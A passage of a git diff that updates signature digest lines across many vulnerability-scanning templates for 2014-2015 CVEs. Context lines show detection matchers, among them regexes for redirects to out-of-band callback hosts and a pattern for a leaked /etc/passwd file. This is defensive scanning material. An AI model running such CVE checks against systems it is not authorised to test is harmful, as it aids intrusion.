--git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 1024ca7d24..f453d70361 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100be312073dc375dc52c51803c15957fa59ab561a94ae230469761fba8c62658a0022031b68c07810286d1fc7982a1432cd733266d96e79cbefd78ecfe7efda1a537da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b24f2eded22f635521da9305da04e44977caab36034f61e4c284fa2ff72751e8022100a7a18bd1b02fb3b593da25b9b4cefa64e64abfc3333d10275f2acecab9c615ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index a374c1f0a1..cc5f523f25 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f084b104246235303018810d8792e5824f630fe35d47333a776aa806420a6c0c022062d18f14655f54971c7b74c76d67da39eab2a28c3cda0cc3299aa71eb27e4377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207aaf46ce21f7b7d23028073993ba960a9402a41e5122e87e317c1546ed7de023022100a3915b8808e11371317c9853ddd1af90cdbd667e56ae8980bb783230f9ef61e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 8c76d8151c..7ff5e26b4e 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c64929f18a5e5a9f52a1e9f98cd8b6fd54e28629ed8a90951c20fb3d92ebbabc022100f78ad31e5bed3c7f887f144e59a93df2262514c88a51c84587aa2b92bba8c949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201162e5df8b1906f8db95763aa1edf6ad566fcffdf7ad379020263498c54fc6aa022055945cd909e5da2651d2deec9671777016c5675b1fc44f688551caeaeb184a54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 9ed759e497..ed0c3da790 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402200a5163568ebfefeb8fd9a5eb2e2d967ce02af92a88d23cbc8505810f7f7f2fbd02202bf03a19a205caa00578f4af5ab8ad0498302527c16906781950099cf81c7873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220438c3dc39f07fb06c0bc4202299ead048141ef4fd1e78d248b2fe2c64fa03579022100998678ad24cbaab27d52f1add5e3bd5d90b3fa992e5a9cc4b3ab7b79b303b6c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index b4e5401d88..1b74323a34 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd9eb9a380f1fbf2726b31147593ca7e895c82ec04ff2accc04d4f055b7a3abf02203dcb6e5cfea4af4ce138824fbba863dc75aae8c7c651dd7e4f01291b17e8c36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220095f5802f3ef4856a2369a54db3c67f2f61332be8227e372c4d6d90536abf4b702210087990d62f715413f69598fce8b956508f7382aa6331b101a8499b909624dce88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 87d1b5df14..b70ed17ced 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022056dcc0390d45153fa955d06630597ce895fffc7b0422c2f41513c6340ab3b891022100ae24a085d4d6f78661be66936879fb7d22fe3986a7235c90bbe94a4b1e1fb99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220752cf70b9536d3ef5866fd3ad483970fcceeac8f798b4b51fb66489af607fcb2022014cfa5df4b4671940d28c6b12b3a22bfad5f743e1f762c60c038ddb5c10e352e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 9b495cf2af..d9d65e94c4 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220122b6dcfe5f4522732188a18dc70d5948ed467ff9ddb9baf9016178978dad972022100e54b1f0c076e3d1a27891fe239997f11a438c12257ef95b5aeb16dd380322c53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d4daed5c9b33bd54ae723a43a428ed0569ea938657f7458e1188f0b9f472d1302204ad0da98a5367ce89f08b45a7a6b19acf08f79ad4595f9a92a1b66f0ac7eb3d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 4d07d3afd6..bb7632008d 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ff648e6238e67cdb5fc307d65f684556ccfaccab142ffbad15d6195b675192902204d8a2dc6b14a71a9e0cd2f96d657bbf4f6047e0debe0bd8cb83452e994b23ff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057f3cc82c916b0333b215cceb0e8677c00f6a92bd3e3ffd41595ec2dd0f17dc50221009be9ff3d4f2bbca5d492d597cc5ffcd7e19ad126ca242254c96449f1b95b4dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index c5631951fd..2c66579e0d 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f70c3aa6317938267f7df4b25f5ef6c9c78bc137aad2691873d6ec24424a201b022100cb7ff2bf016f58396ddb7c976eceb4c2c310c98f03b888098a9107220dda82ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220434d7063c8033fcaeb16a5f189615ce61fe22b32959744d26fcc2a79c961b7b7022100ac4e895e532ea7844ca056a1a84df2287b9606d2d3f90557bf0ce5f54a34dd48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 637d1eebc6..49a3680ad6 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 302 -# digest: 4a0a004730450220634f26c8fa6d2ec9d449a59b9286d363caeb2f415a4ff5b8a1939ae4378edf20022100c2e721fe5682e209ef6ed66bd754070d8eb6ca353d9f2239503847a1ff73630f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5c0a356a8f927509965b4632a3ca2e0a673e782c1757912a8482883099923530220587d0c87adf24ca70c03920cd33bec88fa9e83fd67b97ef6a0cd3d6aaf086cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index d3d040365b..c0cc2a49f0 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201a76cdd473461e509a8c694cd5fc5f1331a157991083e118aa0f8ad790c33f4f022023ddd15dcd8e872fd2dfa54b109481b94ccf553e63001fee7e65d1650c98d231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207230c582a2fe269dfc379987a9fc1e95856acf59b3dc4a760c222378ef73991a02204c064af799e4ece5bfec439367d307c00936777d65af21b8966cb5ef43597c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 26c603b3ab..a9600177ec 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022017b30983b8c743e91bcf35aa59a0373279479cb97829ab74c934b545b5d2382f022100f1640cf0fcd3ec60747214ab6b910ac01ef92f7dd10b7902844c422c1abf8337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220732bcdce2f5957e545e5529ba7f0ef979e33c4f0b87f87f65bac08a6af47196a022015fe1018d46a9a1dcd60143319fc73d5329e8c8616118e0ee71651a80ef39b73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 5b33b9a5a1..45f9472b35 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210085c810aa7820426b4ceef16028597acca8da44f021fd8ec683fe8e119bdc2b3502205235942e4b4021456f06c3ad2fc1aa25cb894521372d46fab753b883e3d30a94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6b2afdc70d49f74df8324a0a67b94713a2f357818575c0e321493993eb8618e02203759c8ee851dd8fbc58b489bc115ef4bded17fce4806dc92a18b234f8e47e68a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 122d314988..b09252f2de 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b1a27abebb2eae51634e7a91f11cb3711eae32924f5d273d9edfa803cb8ed04f022100a011c773c5fa1b25453891177e5e62bc343d0a16836db2e2733adb89e4bd9e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093a92bacec199c8828c093ffa3b703aaa84a7753d7fea717c2140e018c60dbad022053409b3bc1b8b1f5ad6c8d0d0df264fc708d81dc35090c1ae667e7ec79dcf2d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index cdfd464d15..75ff4c87ab 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046ca4a1f3180802280ba339f44fc52f3e4365a1e4d287e55c58402e382b22da2022100e3259ddb7029f93ad7e2f091dcfdb4bed79cd95543043ec65ea523eb1644c3be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5908e0f9edeca22e9a7ad853a0e85a9ce62b62ab96698104b29520f1742cf98022100ee3d0c92483bc462df933219a20b2ef2165f51885c280fd0bf16196b9590ceb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 8830878e91..2ad61722c3 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202549d83eabfce63917a376c0fcb0b442a9c32468df225270a14f80c7f7e2bc7602201cd07be85b2da7e697826f196a567384dabda36d6d2ff6e7ace29538494d504e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038fdadcc8b77d900556b1b3e8020cc1573d6678a06266a7907ff9b8d27f9aee402207baf0eab54358ef7316ce6744660ba2ccae7edfdf85755b2e2cfbffe1b57d69f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 393429e039..f8e3f553eb 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc820f1cc4d333d47e830dbf6be78240f2337113217ead7b6eb84e5cc919740202202ac8c875884b9bf8975d52d2e50a790ab90f8579ebd301930eebc60802b858b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5013129ac71cec012cb0bd921788c2baf66fe6ff1d5ed53965c80faa2edb47f0220392c357fc9b37a4fcc2c0f965d80064ececb545c3278b6151dd998d4af33062a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 7a141136dc..ceeee62eaa 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040272f4f73c81bc79bc2d61668da04e69f10ea7be6b3c2b0dafd4f969e0a0e09022100ed604e0dbf6c545d62974b22c016108152f583e5f7d29b378dde0927cb7a80ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207af807cefc14c386ba2ae88a1630bcf8857275614b11b100294465951da8dd9602204e1cc963a8839e4f750feea3acef0d3fb2e77be77dd49916efe90f47f6b812b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index d17642be4e..08f274e8a4 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100875b5497eb3adbce2c3f606fd17d363e6ea418f870fea75120ca19e89a857a610221009cfb2345bbd891da8aab5ee1f5031a2aef3ae10c271ccbe46706cc994de7eff5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e40ae21d0737a5f9bb0c02c6242a82ac39bf442fa5cbcfd0a121949a556002e9022100959263d9f4339863cf688e69a3ab2f63e27b1673c1fefd008051a3792d3e73f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 8276389385..7088116675 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f352842c7a3cd215aae483270498605cdbda68e467a8be660ca710ad4934758802201612aca609617c4e58259bbee9e6dacd254abd5fffd41148364a865fe71e2fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220529d7a226e6b5bd71d9520775d2e75dee44bd62c8d01b1c816e6772754ed4f840220679b5bfb5232320ca72feedf9e95111c2aca12245b4a69671a86e6c43b9f8fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 285179902c..cfa9666a33 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a8f1b536bbc0034081dc6470fc912055f6a4ba87d655cfff8340f1c73d52ffda022100b490dca5de2ecd3c8f5e5c1ceea38d54db1cf0ec018a27fca4a09200c7e40fd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a6273a7cf97a7f99b45f8f8874c9cda1d9b62db8a3fdf826ff03a15eee83b33022100830609a3050d45361131af6522c44d57f3d3a083c13a2463eca5e991cd535f11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 072a9f2976..6ec619ff73 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a09010f5b9f4018e4fc0c383188174604fd390338eba8999b15cddc572fb3aef022100879ae7ef25dfb610b1d2c23646b71404ce647cadd8a6f66212a51815f9847542:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cab0415139dca250711cb9d85615d7de7d89597f582e9433feae760ad698197c022053ce632e822d38b646c7912458fa5436241e448db08311f70acd9a0cb10e56e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 21f145f6dc..ba77aa6dc1 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210088f200b0e4e5251452929ffe746143a17733fef1673f2d5e507b73163a40da32022058daf619169fae1454b37d82b9eb25d92d39df2081ee24dd0b288d597566d58e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207fa53f787fab07b2d2d4a23d4df914a42f7f4d1d858eafa1b9c42253defe29ca02205ff9ab22043eaced5f02ac22e85c28e12356e5a18c4210c1f80676ef020fcc56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 872216773e..a63ce0bc85 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022026b232f65ce0454fcc857e38dd42513ddcebb2decb030e3419e0d576401f48e1022100cd75e29bb9c16cdeee959fcfe02b53e857ec460bae76188cd082bb914c9833d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203ca161915a3741c7f9bd67e563f14f395bc54bf78f178096e687b47e3fa0cb1002203ad80f5c4124586061e837767d02e3c92fb20f3402e652fbadd28b87c97036ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 0484abf2c2..2b3e0668e3 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dcc1878b9e96a07a63c2e7f707765d75859d430217f6da0c8df5ef5a81e908ee02203f95e514f816093a524a369721a6d66127b324453797366058f5fe8fa831c6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022703d8daa41a85d7c9d4625ca2f7870c29a71b752ce7fa2fdd0d716271b97fe0221008075e032c0ac57c5bb5e830893b36f9878673c00bc557ca11199b4ce69608920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index ae0135d343..d15268f8c8 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4a0a00473045022100ca88241cb70b786eebd10dadef7fc3c2a36f394c9fb81a63d45dcc5c0424be5b02205c88b91297a57c8adc0ae833c3cdf85452d48eab99516a27cf9f7e608ec60fe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea8b030284b75f533ea8e28cf9e87925eb81eff32f0d25ecaed59a7b95a40a20022100ad541af54276dd356489cacbb05a44b7f2bd8b2a8ba536368997198ccba4badf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 95573ddca7..e8a72ca900 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 4a0a0047304502204b237870e6c6db8b6116c32384c5508d3d240e024b1e043a790c2c7eec2f6abe022100aa806c4f701a9211b8d7d8fcb26567a9f0745735b2dabf6c98404b4a699c9af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a1f5da0b1cb13bbf61d116bee363fa549601636de6963a492ddccce62fa8b51022059c067c27f8b3b1cd9632a372d7cfb91016b87d081cbfc45d1ce140656ed7eec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 4d32895f9d..44f6c7c85d 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201158c001259e4db42e4a00041d56cb95363728da7170e407c3c0d99701f0f426022078549a7f4b8f1aca49f2e0c6dd0849c52df6812d9e901daa10b925a59aea47c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b57edcbf2aa7baf06020a52fbd5348a3bfe52583e1010d6d7e2fedba9e5ebed5022100f81ff9e8ceaedc80ac1ea3f4a1d29123ef70c3222105ece63fd969e8e0dcf206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 64853132c4..3dd4e57288 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da1a4b2faf843d0cd2958b81a243820ddf23198236e08945af7ee4d11fdfb1eb02201af82b252a624c7cfb3f00add99f97d655ab196de12585486f921fdbe24621d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022068a831a5336a611b5df8ee14a5094fbda8cc5b93571da01506baf79d07afd519022100cf81680745b0d61bddfd6e722d75470ce0bcf4277a61a57ac9f2f790e90cf5bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 3bf4beaf9e..2d9d27094c 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -# digest: 4a0a0047304502201c6fffa0d15f9148f4c05587ad2835d2c910c891a442c06c52768c824a066e0e022100d6c74d83c4b9dd56093f9eb0ac9894df48b8df58063c1dafa7b813d916a77efe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8cffc0c787b3aa7891e87e2778fb6ff7775c31481e87da323dbb2e914f49f280221009b378e5369ca7190cd1d66d44b87d7bc4afea038c57fd094563610ef9aa16442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 65db1e9243..b09a04299d 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f404996a650f849f8acdc78913fc8ce52c3c0200abb5cf05a75bccfeefa98c850221009be38a6ea4eb6788d5a4093af9303d1ea1fcf9dbe3a19ef4684ace7e1b97c6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c14480f064b2070b96332bb6d13fea4cdb2fec342a2e4a555f3cabdd47bb1f81022068c29f106112139602efc4cbb94f79cb73357bc514af798420f2def8198ff05e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index c4f5d34a47..29541314aa 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f259341e5029ff24213042a775167d601b3f80f665399afb0b34b2db9fe65e14022100ee72ac5c20cd66f9efe68223934edaf14df250c33b3ef09386df79bf260973bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdabecdfa74415cff434696ea80d42e0417890543767de0fc7a94a15c29d3981022100e3e1f0c0bda727280edfcd1329f2265556a161d64a2b45e7f94f0122509151e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 371db119c4..f578d01e5b 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -54,4 +54,4 @@ http: - data-session-id= case-insensitive: true condition: or -# digest: 490a0046304402201197524d3133f59d30bf768865a3eb2e19500360f5ea87c9b8644f9b7166409d02203d2594302673a834215f81f3177a4cc40c415282c3471af3b589f3391c7ef914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100964fbdf6ba744aa3180d43cbab6d400d8a6cbc00996ec0e17ef384643b41eeed02207ad628d707c3e3d2603d8dd03ac0327bf77fd3f79be18c48ca5d43683d2b623b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 4a89dafedd..eddaae3651 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8ff66900de1efea5253bacb2bb6fc1e0ab52658637cd386a8f93e5b7f271700022066972a5ef010ff7ad2fe76934a64745cc1fa3efd7d250b36f784756b571e7a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aadc693ac1f415f7d8e5e073f3662a9b23f9c82a7cad1df9c682909b7a131ac00221008017cfb2d96a9513b90038fa076da775aca4a5ca1a3ae0fb9ef8812ff55bec28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index c0c2625651..14d209c043 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008bca698072e26a4fe5f7beb120720e28e335fd91dff894145386aad1d64cfa0d022100bd52fa1fdd4389bcb557b7debfc868e2b562498529ed1916c0588d8eeb52bdd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd833dfe6f287ab8a1ab52ddbb396b311de8fbf9fc37a7dee9113ea196140db90220756f3723af383fbb8fad4d018d069212748c623a6f053ea56a24d08ee09c7d45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 17e6fb57d9..c30c6795fd 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -49,4 +49,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4a0a00473045022100f166f87894929871da0a249591949d551feb8a59e23b35b7c0348aa0e149818e02203dc6bbbb1d0ec6cc49b5cfa60e0be43c5c529ef74e2954bb042cbf362d64dd01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f06d7af59b3843fd3371c412b8dbd48c7c020eaef8d3eefadb839196de620ef20220411751344e3842423a2e8efe274b4bbb5e6656f840e3342933bb7e70cc31002a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index ce8ec19fcf..d38a80bc4b 100644 --- 